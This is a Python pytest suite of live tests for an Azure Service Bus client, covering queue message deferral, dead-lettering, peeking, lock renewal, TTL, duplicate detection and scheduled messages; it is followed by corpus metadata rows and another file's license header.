    client = ServiceBusClient.from_connection_string(live_servicebus_config['conn_str'], debug=False)
    queue_client = client.get_queue(standard_queue)
    with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
        with queue_client.get_sender() as sender:
            for i in range(10):
                message = Message("Abandoned message no. {}".format(i))
                sender.send(message)

        count = 0
        for message in receiver:
            print_message(message)
            if not message.header.delivery_count:
                # First delivery: abandon so the service redelivers it.
                count += 1
                message.abandon()
            else:
                assert message.header.delivery_count == 1
                message.complete()

    assert count == 10

    with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
        count = 0
        for message in receiver:
            print_message(message)
            message.complete()
            count += 1
    assert count == 0
@pytest.mark.liveTest
def test_queue_by_servicebus_client_iter_messages_with_defer(live_servicebus_config, standard_queue):
    """Deferred messages are removed from the normal delivery stream: a second
    plain receive pass must see nothing."""
    client = ServiceBusClient(
        service_namespace=live_servicebus_config['hostname'],
        shared_access_key_name=live_servicebus_config['key_name'],
        shared_access_key_value=live_servicebus_config['access_key'],
        debug=False)
    queue_client = client.get_queue(standard_queue)
    deferred_messages = []
    with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
        with queue_client.get_sender() as sender:
            for i in range(10):
                message = Message("Deferred message no. {}".format(i))
                sender.send(message)

        count = 0
        for message in receiver:
            deferred_messages.append(message.sequence_number)
            print_message(message)
            count += 1
            message.defer()

    assert count == 10

    with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
        count = 0
        for message in receiver:
            print_message(message)
            message.complete()
            count += 1
    assert count == 0
@pytest.mark.liveTest
def test_queue_by_servicebus_client_iter_messages_with_retrieve_deferred_client(live_servicebus_config, standard_queue):
    """Retrieve deferred messages via the queue client (not a receiver) and
    settle them in bulk with settle_deferred_messages."""
    client = ServiceBusClient(
        service_namespace=live_servicebus_config['hostname'],
        shared_access_key_name=live_servicebus_config['key_name'],
        shared_access_key_value=live_servicebus_config['access_key'],
        debug=False)
    queue_client = client.get_queue(standard_queue)
    deferred_messages = []
    with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
        with queue_client.get_sender() as sender:
            for i in range(10):
                message = Message("Deferred message no. {}".format(i))
                sender.send(message)

        count = 0
        for message in receiver:
            deferred_messages.append(message.sequence_number)
            print_message(message)
            count += 1
            message.defer()

    assert count == 10
    deferred = queue_client.receive_deferred_messages(deferred_messages, mode=ReceiveSettleMode.PeekLock)
    assert len(deferred) == 10
    for message in deferred:
        assert isinstance(message, DeferredMessage)
        # Client-retrieved deferred messages cannot be settled individually.
        with pytest.raises(ValueError):
            message.complete()
    # Only recognized settle verbs are accepted.
    with pytest.raises(ValueError):
        queue_client.settle_deferred_messages('foo', deferred)
    queue_client.settle_deferred_messages('completed', deferred)
    # Once settled, the sequence numbers can no longer be retrieved.
    with pytest.raises(ServiceBusError):
        queue_client.receive_deferred_messages(deferred_messages)
@pytest.mark.liveTest
def test_queue_by_servicebus_client_iter_messages_with_retrieve_deferred_receiver_complete(live_servicebus_config, standard_queue):
    """Retrieve deferred messages via a receiver; these are lock-bearing and can
    be renewed and completed individually."""
    client = ServiceBusClient(
        service_namespace=live_servicebus_config['hostname'],
        shared_access_key_name=live_servicebus_config['key_name'],
        shared_access_key_value=live_servicebus_config['access_key'],
        debug=False)
    queue_client = client.get_queue(standard_queue)
    deferred_messages = []
    messages = [Message("Deferred message no. {}".format(i)) for i in range(10)]
    # NOTE(review): session= is passed although the fixture is a standard
    # (non-sessionful) queue -- presumably ignored here; verify.
    results = queue_client.send(messages, session="test_session")
    # send() returns (success, error) pairs per message.
    assert all(result[0] for result in results)

    with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
        count = 0
        for message in receiver:
            deferred_messages.append(message.sequence_number)
            print_message(message)
            count += 1
            message.defer()

    assert count == 10

    with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
        deferred = receiver.receive_deferred_messages(deferred_messages)
        assert len(deferred) == 10
        for message in deferred:
            assert isinstance(message, DeferredMessage)
            assert message.lock_token
            assert message.locked_until
            assert message._receiver
            message.renew_lock()
            message.complete()
@pytest.mark.liveTest
def test_queue_by_servicebus_client_iter_messages_with_retrieve_deferred_receiver_deadletter(live_servicebus_config, standard_queue):
    """Dead-letter retrieved deferred messages and drain them from the
    dead-letter sub-queue, checking the recorded reason/description."""
    client = ServiceBusClient(
        service_namespace=live_servicebus_config['hostname'],
        shared_access_key_name=live_servicebus_config['key_name'],
        shared_access_key_value=live_servicebus_config['access_key'],
        debug=False)
    queue_client = client.get_queue(standard_queue)
    deferred_messages = []
    messages = [Message("Deferred message no. {}".format(i)) for i in range(10)]
    results = queue_client.send(messages)
    assert all(result[0] for result in results)

    with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
        count = 0
        for message in receiver:
            deferred_messages.append(message.sequence_number)
            print_message(message)
            count += 1
            message.defer()

    assert count == 10

    with queue_client.get_receiver(idle_timeout=5) as session:
        deferred = session.receive_deferred_messages(deferred_messages)
        assert len(deferred) == 10
        for message in deferred:
            assert isinstance(message, DeferredMessage)
            message.dead_letter("something")

    count = 0
    with queue_client.get_deadletter_receiver(idle_timeout=5) as receiver:
        for message in receiver:
            count += 1
            print_message(message)
            # The single dead_letter() argument shows up as both reason and
            # error description on the dead-lettered message.
            assert message.user_properties[b'DeadLetterReason'] == b'something'
            assert message.user_properties[b'DeadLetterErrorDescription'] == b'something'
            message.complete()
    assert count == 10
@pytest.mark.liveTest
def test_queue_by_servicebus_client_iter_messages_with_retrieve_deferred_receiver_deletemode(live_servicebus_config, standard_queue):
    """Retrieving deferred messages in ReceiveAndDelete mode settles them on
    receipt; a second retrieval of the same sequence numbers must fail."""
    client = ServiceBusClient(
        service_namespace=live_servicebus_config['hostname'],
        shared_access_key_name=live_servicebus_config['key_name'],
        shared_access_key_value=live_servicebus_config['access_key'],
        debug=False)
    queue_client = client.get_queue(standard_queue)
    deferred_messages = []
    messages = [Message("Deferred message no. {}".format(i)) for i in range(10)]
    results = queue_client.send(messages)
    assert all(result[0] for result in results)

    count = 0
    receiver = queue_client.get_receiver(idle_timeout=5)
    for message in receiver:
        deferred_messages.append(message.sequence_number)
        print_message(message)
        count += 1
        message.defer()

    assert count == 10

    with queue_client.get_receiver(idle_timeout=5) as receiver:
        deferred = receiver.receive_deferred_messages(deferred_messages, mode=ReceiveSettleMode.ReceiveAndDelete)
        assert len(deferred) == 10
        for message in deferred:
            assert isinstance(message, DeferredMessage)
            with pytest.raises(MessageAlreadySettled):
                message.complete()
        with pytest.raises(ServiceBusError):
            deferred = receiver.receive_deferred_messages(deferred_messages)
@pytest.mark.liveTest
def test_queue_by_servicebus_client_iter_messages_with_retrieve_deferred_not_found(live_servicebus_config, standard_queue):
    """Requesting deferred messages by unknown/partially-unknown sequence
    numbers raises ServiceBusError."""
    client = ServiceBusClient(
        service_namespace=live_servicebus_config['hostname'],
        shared_access_key_name=live_servicebus_config['key_name'],
        shared_access_key_value=live_servicebus_config['access_key'],
        debug=False)
    queue_client = client.get_queue(standard_queue)
    deferred_messages = []
    with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
        with queue_client.get_sender() as sender:
            for i in range(3):
                message = Message("Deferred message no. {}".format(i))
                sender.send(message)

        count = 0
        for message in receiver:
            deferred_messages.append(message.sequence_number)
            print_message(message)
            count += 1
            message.defer()

    assert count == 3

    # Sequence numbers that were never deferred (or don't exist) must error.
    with pytest.raises(ServiceBusError):
        deferred = queue_client.receive_deferred_messages([3, 4], mode=ReceiveSettleMode.PeekLock)

    with pytest.raises(ServiceBusError):
        deferred = queue_client.receive_deferred_messages([5, 6, 7], mode=ReceiveSettleMode.PeekLock)
@pytest.mark.liveTest
def test_queue_by_servicebus_client_receive_batch_with_deadletter(live_servicebus_config, standard_queue):
    """Dead-letter messages received via fetch_next batches; the main queue must
    then be empty."""
    client = ServiceBusClient(
        service_namespace=live_servicebus_config['hostname'],
        shared_access_key_name=live_servicebus_config['key_name'],
        shared_access_key_value=live_servicebus_config['access_key'],
        debug=False)

    queue_client = client.get_queue(standard_queue)
    with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock, prefetch=10) as receiver:
        with queue_client.get_sender() as sender:
            for i in range(10):
                message = Message("Dead lettered message no. {}".format(i))
                sender.send(message)

        count = 0
        messages = receiver.fetch_next()
        while messages:
            for message in messages:
                print_message(message)
                count += 1
                message.dead_letter(description="Testing")
            messages = receiver.fetch_next()

    assert count == 10

    with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
        count = 0
        for message in receiver:
            print_message(message)
            message.complete()
            count += 1
    assert count == 0
@pytest.mark.liveTest
def test_queue_by_servicebus_client_receive_batch_with_retrieve_deadletter(live_servicebus_config, standard_queue):
    """Dead-letter a batch of messages and drain them back from the dead-letter
    sub-queue receiver."""
    client = ServiceBusClient(
        service_namespace=live_servicebus_config['hostname'],
        shared_access_key_name=live_servicebus_config['key_name'],
        shared_access_key_value=live_servicebus_config['access_key'],
        debug=False)

    queue_client = client.get_queue(standard_queue)
    with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock, prefetch=10) as receiver:
        with queue_client.get_sender() as sender:
            for i in range(10):
                message = Message("Dead lettered message no. {}".format(i))
                sender.send(message)

        count = 0
        messages = receiver.fetch_next()
        while messages:
            for message in messages:
                print_message(message)
                message.dead_letter(description="Testing queue deadletter")
                count += 1
            messages = receiver.fetch_next()

    # The context manager closed the handler; further fetches are invalid.
    with pytest.raises(InvalidHandlerState):
        receiver.fetch_next()
    assert count == 10

    with queue_client.get_deadletter_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
        count = 0
        for message in receiver:
            print_message(message)
            message.complete()
            count += 1
    assert count == 10
@pytest.mark.liveTest
def test_queue_by_servicebus_client_session_fail(live_servicebus_config, standard_queue):
    """A session-bound receiver on a non-sessionful queue is rejected, while a
    session-bound sender is still allowed to send."""
    sb_client = ServiceBusClient(
        service_namespace=live_servicebus_config['hostname'],
        shared_access_key_name=live_servicebus_config['key_name'],
        shared_access_key_value=live_servicebus_config['access_key'],
        debug=False)
    target_queue = sb_client.get_queue(standard_queue)

    # Receiving by session from a standard queue must be refused up front.
    with pytest.raises(ValueError):
        target_queue.get_receiver(session="test")

    # Sending with a session id, however, succeeds.
    with target_queue.get_sender(session="test") as session_sender:
        session_sender.send(Message("test session sender"))
@pytest.mark.liveTest
def test_queue_by_servicebus_client_browse_messages_client(live_servicebus_config, standard_queue):
    """Peeked messages are read-only PeekMessage instances: they cannot be
    settled, and peeking does not consume them."""
    sb_client = ServiceBusClient(
        service_namespace=live_servicebus_config['hostname'],
        shared_access_key_name=live_servicebus_config['key_name'],
        shared_access_key_value=live_servicebus_config['access_key'],
        debug=False)
    target_queue = sb_client.get_queue(standard_queue)

    with target_queue.get_sender() as sender:
        for idx in range(5):
            sender.send(Message("Test message no. {}".format(idx)))

    peeked = target_queue.peek(5)
    assert len(peeked) == 5
    assert all(isinstance(item, PeekMessage) for item in peeked)
    for peeked_msg in peeked:
        print_message(peeked_msg)
        # PeekMessage carries no lock, so settling it is a type error.
        with pytest.raises(TypeError):
            peeked_msg.complete()
@pytest.mark.liveTest
def test_queue_by_servicebus_client_browse_messages_with_receiver(live_servicebus_config, standard_queue):
    """Peek through an open receiver: results are read-only PeekMessage objects."""
    client = ServiceBusClient(
        service_namespace=live_servicebus_config['hostname'],
        shared_access_key_name=live_servicebus_config['key_name'],
        shared_access_key_value=live_servicebus_config['access_key'],
        debug=False)

    queue_client = client.get_queue(standard_queue)
    with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
        with queue_client.get_sender() as sender:
            for i in range(5):
                message = Message("Test message no. {}".format(i))
                sender.send(message)

        messages = receiver.peek(5)
        assert len(messages) > 0
        assert all(isinstance(m, PeekMessage) for m in messages)
        for message in messages:
            print_message(message)
            # Peeked messages hold no lock and cannot be settled.
            with pytest.raises(TypeError):
                message.complete()
@pytest.mark.liveTest
def test_queue_by_servicebus_client_browse_empty_messages(live_servicebus_config, standard_queue):
    """Peeking an empty queue returns an empty list rather than raising."""
    sb_client = ServiceBusClient(
        service_namespace=live_servicebus_config['hostname'],
        shared_access_key_name=live_servicebus_config['key_name'],
        shared_access_key_value=live_servicebus_config['access_key'],
        debug=False)
    target_queue = sb_client.get_queue(standard_queue)

    with target_queue.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock, prefetch=10) as browse_receiver:
        peeked = browse_receiver.peek(10)
        assert len(peeked) == 0
@pytest.mark.liveTest
def test_queue_by_servicebus_client_fail_send_messages(live_servicebus_config, standard_queue):
    """Sending an oversized (512KB) message fails through every send path:
    client.send, sender.send, and queued/pending send."""
    client = ServiceBusClient(
        service_namespace=live_servicebus_config['hostname'],
        shared_access_key_name=live_servicebus_config['key_name'],
        shared_access_key_value=live_servicebus_config['access_key'],
        debug=False)

    queue_client = client.get_queue(standard_queue)
    too_large = "A" * 1024 * 512

    try:
        results = queue_client.send(Message(too_large))
    except MessageSendFailed:
        # On some platforms the failure surfaces as an exception instead of a
        # result tuple; skip rather than fail the suite.
        pytest.skip("Open issue for uAMQP on OSX")

    # client.send reports failure as (False, error) rather than raising.
    assert len(results) == 1
    assert not results[0][0]
    assert isinstance(results[0][1], MessageSendFailed)

    with queue_client.get_sender() as sender:
        with pytest.raises(MessageSendFailed):
            sender.send(Message(too_large))

    with queue_client.get_sender() as sender:
        sender.queue_message(Message(too_large))
        results = sender.send_pending_messages()
        assert len(results) == 1
        assert not results[0][0]
        assert isinstance(results[0][1], MessageSendFailed)
@pytest.mark.liveTest
def test_queue_by_servicebus_client_fail_send_batch_messages(live_servicebus_config, standard_queue):
    """Oversized batch sends should fail on every send path (currently skipped
    pending an upstream uAMQP fix)."""
    pytest.skip("TODO: Pending bugfix in uAMQP")
    def batch_data():
        # Three ~256KB payloads -- together exceeding the service size limit.
        for i in range(3):
            yield str(i) * 1024 * 256

    client = ServiceBusClient(
        service_namespace=live_servicebus_config['hostname'],
        shared_access_key_name=live_servicebus_config['key_name'],
        shared_access_key_value=live_servicebus_config['access_key'],
        debug=False)

    queue_client = client.get_queue(standard_queue)
    results = queue_client.send(BatchMessage(batch_data()))
    assert len(results) == 4
    assert not results[0][0]
    assert isinstance(results[0][1], MessageSendFailed)

    with queue_client.get_sender() as sender:
        with pytest.raises(MessageSendFailed):
            sender.send(BatchMessage(batch_data()))

    with queue_client.get_sender() as sender:
        sender.queue_message(BatchMessage(batch_data()))
        results = sender.send_pending_messages()
        assert len(results) == 4
        assert not results[0][0]
        assert isinstance(results[0][1], MessageSendFailed)
@pytest.mark.liveTest
def test_queue_by_servicebus_client_renew_message_locks(live_servicebus_config, standard_queue):
    """renew_lock() extends a message's lock; an un-renewed lock eventually
    expires and can no longer be completed."""
    client = ServiceBusClient(
        service_namespace=live_servicebus_config['hostname'],
        shared_access_key_name=live_servicebus_config['key_name'],
        shared_access_key_value=live_servicebus_config['access_key'],
        debug=False)

    queue_client = client.get_queue(standard_queue)
    messages = []
    locks = 3
    with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock, prefetch=10) as receiver:
        with queue_client.get_sender() as sender:
            for i in range(locks):
                message = Message("Test message no. {}".format(i))
                sender.send(message)

        messages.extend(receiver.fetch_next())
        recv = True
        while recv:
            recv = receiver.fetch_next()
            messages.extend(recv)

        try:
            # NOTE(review): 'message' here is the last *sent* message from the
            # loop above, not a received one -- looks like it should check each
            # received m instead; confirm intent.
            assert not message.expired
            for m in messages:
                time.sleep(5)
                initial_expiry = m.locked_until
                m.renew_lock()
                assert (m.locked_until - initial_expiry) >= timedelta(seconds=5)
        finally:
            messages[0].complete()
            messages[1].complete()
            # Let the third message's lock lapse, then settling must fail.
            time.sleep(30)
            with pytest.raises(MessageLockExpired):
                messages[2].complete()
@pytest.mark.liveTest
def test_queue_by_queue_client_conn_str_receive_handler_with_autolockrenew(live_servicebus_config, standard_queue):
    """AutoLockRenew keeps the first message's lock alive until its timeout,
    after which settling raises MessageLockExpired with AutoLockRenewTimeout
    as the inner exception; remaining messages are completed normally."""
    queue_client = QueueClient.from_connection_string(
        live_servicebus_config['conn_str'],
        name=standard_queue,
        debug=False)

    with queue_client.get_sender() as sender:
        for i in range(10):
            message = Message("{}".format(i))
            sender.send(message)

    renewer = AutoLockRenew()
    messages = []
    with queue_client.get_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock, prefetch=10) as receiver:
        for message in receiver:
            if not messages:
                # First message: register for auto-renew with a 60s cap, then
                # wait past the cap so the renewed lock finally expires.
                messages.append(message)
                assert not message.expired
                renewer.register(message, timeout=60)
                print("Registered lock renew thread", message.locked_until, datetime.now())
                time.sleep(50)
                print("Finished first sleep", message.locked_until)
                assert not message.expired
                time.sleep(25)
                print("Finished second sleep", message.locked_until, datetime.now())
                assert message.expired
                try:
                    message.complete()
                    raise AssertionError("Didn't raise MessageLockExpired")
                except MessageLockExpired as e:
                    assert isinstance(e.inner_exception, AutoLockRenewTimeout)
            else:
                if message.expired:
                    # Locks of the other prefetched messages lapsed during the
                    # sleeps above.
                    print("Remaining messages", message.locked_until, datetime.now())
                    assert message.expired
                    with pytest.raises(MessageLockExpired):
                        message.complete()
                else:
                    # Redelivered messages can be completed normally.
                    assert message.header.delivery_count >= 1
                    print("Remaining messages", message.locked_until, datetime.now())
                    messages.append(message)
                    message.complete()

    renewer.shutdown()
    assert len(messages) == 11
@pytest.mark.liveTest
def test_queue_message_time_to_live(live_servicebus_config, standard_queue):
    """A message whose TTL lapses disappears from the main queue and lands in
    the dead-letter sub-queue."""
    client = ServiceBusClient(
        service_namespace=live_servicebus_config['hostname'],
        shared_access_key_name=live_servicebus_config['key_name'],
        shared_access_key_value=live_servicebus_config['access_key'],
        debug=False)
    import uuid
    queue_client = client.get_queue(standard_queue)
    with queue_client.get_sender() as sender:
        content = str(uuid.uuid4())
        message_id = uuid.uuid4()
        message = Message(content)
        message.time_to_live = timedelta(seconds=30)
        sender.send(message)

    # Wait out the TTL before checking the main queue.
    time.sleep(30)
    with queue_client.get_receiver() as receiver:
        messages = receiver.fetch_next(timeout=10)
    assert not messages

    with queue_client.get_deadletter_receiver(idle_timeout=5, mode=ReceiveSettleMode.PeekLock) as receiver:
        count = 0
        for message in receiver:
            print_message(message)
            message.complete()
            count += 1
        assert count == 1
@pytest.mark.liveTest
def test_queue_message_duplicate_detection(live_servicebus_config, duplicate_queue):
    """On a duplicate-detection queue, five sends with the same message_id
    result in exactly one delivered message."""
    client = ServiceBusClient(
        service_namespace=live_servicebus_config['hostname'],
        shared_access_key_name=live_servicebus_config['key_name'],
        shared_access_key_value=live_servicebus_config['access_key'],
        debug=False)
    import uuid
    message_id = uuid.uuid4()
    queue_client = client.get_queue(duplicate_queue)
    with queue_client.get_sender() as sender:
        for i in range(5):
            message = Message(str(i))
            # Same id on every message -- the service de-duplicates on it.
            message.properties.message_id = message_id
            sender.send(message)

    with queue_client.get_receiver(idle_timeout=5) as receiver:
        count = 0
        for message in receiver:
            print_message(message)
            assert message.properties.message_id == message_id
            message.complete()
            count += 1
        assert count == 1
@pytest.mark.liveTest
def test_queue_message_connection_closed(live_servicebus_config, standard_queue):
    """Settling a message after its receiver connection has closed fails with
    MessageSettleFailed."""
    sb_client = ServiceBusClient(
        service_namespace=live_servicebus_config['hostname'],
        shared_access_key_name=live_servicebus_config['key_name'],
        shared_access_key_value=live_servicebus_config['access_key'],
        debug=False)
    import uuid
    target_queue = sb_client.get_queue(standard_queue)

    payload = str(uuid.uuid4())
    with target_queue.get_sender() as sender:
        sender.send(Message(payload))

    with target_queue.get_receiver() as receiver:
        received = receiver.fetch_next(timeout=10)
        assert len(received) == 1

    # The with-block closed the connection; settling must now fail.
    with pytest.raises(MessageSettleFailed):
        received[0].complete()
@pytest.mark.liveTest
def test_queue_message_expiry(live_servicebus_config, standard_queue):
    """An expired lock blocks complete() and renew_lock(); the message is then
    redelivered with an incremented delivery count."""
    client = ServiceBusClient(
        service_namespace=live_servicebus_config['hostname'],
        shared_access_key_name=live_servicebus_config['key_name'],
        shared_access_key_value=live_servicebus_config['access_key'],
        debug=False)
    import uuid
    queue_client = client.get_queue(standard_queue)
    with queue_client.get_sender() as sender:
        content = str(uuid.uuid4())
        message = Message(content)
        sender.send(message)

    with queue_client.get_receiver() as receiver:
        messages = receiver.fetch_next(timeout=10)
        assert len(messages) == 1
        # Let the peek-lock lapse without renewing it.
        time.sleep(30)
        assert messages[0].expired
        with pytest.raises(MessageLockExpired):
            messages[0].complete()
        with pytest.raises(MessageLockExpired):
            messages[0].renew_lock()

    with queue_client.get_receiver() as receiver:
        messages = receiver.fetch_next(timeout=30)
        assert len(messages) == 1
        print_message(messages[0])
        # Redelivery after expiry bumps the delivery count.
        assert messages[0].header.delivery_count > 0
        messages[0].complete()
@pytest.mark.liveTest
def test_queue_message_lock_renew(live_servicebus_config, standard_queue):
    """Renewing the lock twice keeps a message settleable past its original
    lock duration; the queue ends up empty."""
    client = ServiceBusClient(
        service_namespace=live_servicebus_config['hostname'],
        shared_access_key_name=live_servicebus_config['key_name'],
        shared_access_key_value=live_servicebus_config['access_key'],
        debug=False)
    import uuid
    queue_client = client.get_queue(standard_queue)
    with queue_client.get_sender() as sender:
        content = str(uuid.uuid4())
        message = Message(content)
        sender.send(message)

    with queue_client.get_receiver() as receiver:
        messages = receiver.fetch_next(timeout=10)
        assert len(messages) == 1
        time.sleep(15)
        messages[0].renew_lock()
        time.sleep(15)
        messages[0].renew_lock()
        time.sleep(15)
        # 45s have elapsed but the renewals kept the lock alive.
        assert not messages[0].expired
        messages[0].complete()

    with queue_client.get_receiver() as receiver:
        messages = receiver.fetch_next(timeout=10)
        assert len(messages) == 0
@pytest.mark.liveTest
def test_queue_message_receive_and_delete(live_servicebus_config, standard_queue):
    """A ReceiveAndDelete message is settled on receipt: every settle/renew
    operation raises, and the message never reappears."""
    client = ServiceBusClient(
        service_namespace=live_servicebus_config['hostname'],
        shared_access_key_name=live_servicebus_config['key_name'],
        shared_access_key_value=live_servicebus_config['access_key'],
        debug=False)
    queue_client = client.get_queue(standard_queue)
    with queue_client.get_sender() as sender:
        message = Message("Receive and delete test")
        sender.send(message)

    with queue_client.get_receiver(mode=ReceiveSettleMode.ReceiveAndDelete) as receiver:
        messages = receiver.fetch_next(timeout=10)
        assert len(messages) == 1
        received = messages[0]
        print_message(received)
        with pytest.raises(MessageAlreadySettled):
            received.complete()
        with pytest.raises(MessageAlreadySettled):
            received.abandon()
        with pytest.raises(MessageAlreadySettled):
            received.defer()
        with pytest.raises(MessageAlreadySettled):
            received.dead_letter()
        with pytest.raises(MessageAlreadySettled):
            received.renew_lock()

    # Wait out any redelivery window, then confirm the queue stayed empty.
    time.sleep(30)
    with queue_client.get_receiver() as receiver:
        messages = receiver.fetch_next(timeout=10)
        for m in messages:
            print_message(m)
        assert len(messages) == 0
@pytest.mark.liveTest
def test_queue_message_batch(live_servicebus_config, standard_queue):
    """A BatchMessage built from 5 payloads is delivered as 5 individual
    messages."""
    sb_client = ServiceBusClient(
        service_namespace=live_servicebus_config['hostname'],
        shared_access_key_name=live_servicebus_config['key_name'],
        shared_access_key_value=live_servicebus_config['access_key'],
        debug=False)
    target_queue = sb_client.get_queue(standard_queue)

    with target_queue.get_sender() as sender:
        # BatchMessage consumes any iterable of payloads.
        sender.send(BatchMessage("Message no. {}".format(i) for i in range(5)))

    with target_queue.get_receiver() as receiver:
        received = receiver.fetch_next(timeout=10)
        batch = True
        while batch:
            batch = receiver.fetch_next(timeout=10)
            received.extend(batch)

        assert len(received) == 5
        for msg in received:
            print_message(msg)
            msg.complete()
@pytest.mark.liveTest
def test_queue_schedule_message(live_servicebus_config, standard_queue):
    """Schedule a single message ~2 minutes out and verify its content, id and
    scheduled/enqueued timestamps on arrival."""
    client = ServiceBusClient(
        service_namespace=live_servicebus_config['hostname'],
        shared_access_key_name=live_servicebus_config['key_name'],
        shared_access_key_value=live_servicebus_config['access_key'],
        debug=False)
    import uuid
    queue_client = client.get_queue(standard_queue)
    # Drop microseconds so the equality checks against service timestamps hold.
    enqueue_time = (datetime.utcnow() + timedelta(minutes=2)).replace(microsecond=0)
    with queue_client.get_receiver() as receiver:
        with queue_client.get_sender() as sender:
            content = str(uuid.uuid4())
            message_id = uuid.uuid4()
            message = Message(content)
            message.properties.message_id = message_id
            message.schedule(enqueue_time)
            sender.send(message)

        messages = receiver.fetch_next(timeout=120)
        if messages:
            try:
                data = str(messages[0])
                assert data == content
                assert messages[0].properties.message_id == message_id
                assert messages[0].scheduled_enqueue_time == enqueue_time
                assert messages[0].scheduled_enqueue_time == messages[0].enqueued_time.replace(microsecond=0)
                assert len(messages) == 1
            finally:
                for m in messages:
                    m.complete()
        else:
            # Fixed typo in the failure text ("schdeduled" -> "scheduled").
            raise Exception("Failed to receive scheduled message.")
@pytest.mark.liveTest
def test_queue_schedule_multiple_messages(live_servicebus_config, standard_queue):
    """Schedule two messages in one sender.schedule() call and verify both
    arrive with the expected scheduled/enqueued timestamps."""
    client = ServiceBusClient(
        service_namespace=live_servicebus_config['hostname'],
        shared_access_key_name=live_servicebus_config['key_name'],
        shared_access_key_value=live_servicebus_config['access_key'],
        debug=False)
    import uuid
    queue_client = client.get_queue(standard_queue)
    # Drop microseconds so the equality checks against service timestamps hold.
    enqueue_time = (datetime.utcnow() + timedelta(minutes=2)).replace(microsecond=0)
    with queue_client.get_receiver(prefetch=20) as receiver:
        with queue_client.get_sender() as sender:
            content = str(uuid.uuid4())
            message_id_a = uuid.uuid4()
            message_a = Message(content)
            message_a.properties.message_id = message_id_a
            message_id_b = uuid.uuid4()
            message_b = Message(content)
            message_b.properties.message_id = message_id_b
            # schedule() returns one cancellation token per message.
            tokens = sender.schedule(enqueue_time, message_a, message_b)
            assert len(tokens) == 2

        messages = receiver.fetch_next(timeout=120)
        # Second fetch catches a message that arrived after the first batch.
        messages.extend(receiver.fetch_next(timeout=5))
        if messages:
            try:
                data = str(messages[0])
                assert data == content
                assert messages[0].properties.message_id in (message_id_a, message_id_b)
                assert messages[0].scheduled_enqueue_time == enqueue_time
                assert messages[0].scheduled_enqueue_time == messages[0].enqueued_time.replace(microsecond=0)
                assert len(messages) == 2
            finally:
                for m in messages:
                    m.complete()
        else:
            # Fixed typo in the failure text ("schdeduled" -> "scheduled").
            raise Exception("Failed to receive scheduled message.")
@pytest.mark.liveTest
def test_queue_cancel_scheduled_messages(live_servicebus_config, standard_queue):
    """Cancelling scheduled messages by token prevents them from ever being
    enqueued."""
    client = ServiceBusClient(
        service_namespace=live_servicebus_config['hostname'],
        shared_access_key_name=live_servicebus_config['key_name'],
        shared_access_key_value=live_servicebus_config['access_key'],
        debug=False)
    queue_client = client.get_queue(standard_queue)
    enqueue_time = (datetime.utcnow() + timedelta(minutes=2)).replace(microsecond=0)
    with queue_client.get_receiver() as receiver:
        with queue_client.get_sender() as sender:
            message_a = Message("Test scheduled message")
            message_b = Message("Test scheduled message")
            tokens = sender.schedule(enqueue_time, message_a, message_b)
            assert len(tokens) == 2
            sender.cancel_scheduled_messages(*tokens)

        messages = receiver.fetch_next(timeout=120)
        try:
            assert len(messages) == 0
        except AssertionError:
            # Clean up anything that slipped through before re-raising.
            for m in messages:
                print(str(m))
                m.complete()
            raise
| 38.53816
| 133
| 0.677652
| 4,476
| 39,386
| 5.686327
| 0.058534
| 0.061803
| 0.08958
| 0.045262
| 0.82964
| 0.792079
| 0.772434
| 0.747878
| 0.727408
| 0.715347
| 0
| 0.010715
| 0.23224
| 39,386
| 1,021
| 134
| 38.575906
| 0.83098
| 0.007566
| 0
| 0.772885
| 0
| 0
| 0.04713
| 0.000665
| 0
| 0
| 0
| 0
| 0.11124
| 1
| 0.040556
| false
| 0.001159
| 0.019699
| 0
| 0.061414
| 0.035921
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
83e44c181f2054528369bc97abc8970b62e1c7e9
| 13,460
|
py
|
Python
|
smurf/smurf_models/raft_extractor.py
|
shaun95/google-research
|
d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5
|
[
"Apache-2.0"
] | 1
|
2022-03-13T21:48:52.000Z
|
2022-03-13T21:48:52.000Z
|
smurf/smurf_models/raft_extractor.py
|
shaun95/google-research
|
d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5
|
[
"Apache-2.0"
] | null | null | null |
smurf/smurf_models/raft_extractor.py
|
shaun95/google-research
|
d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5
|
[
"Apache-2.0"
] | 1
|
2022-03-30T07:20:29.000Z
|
2022-03-30T07:20:29.000Z
|
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
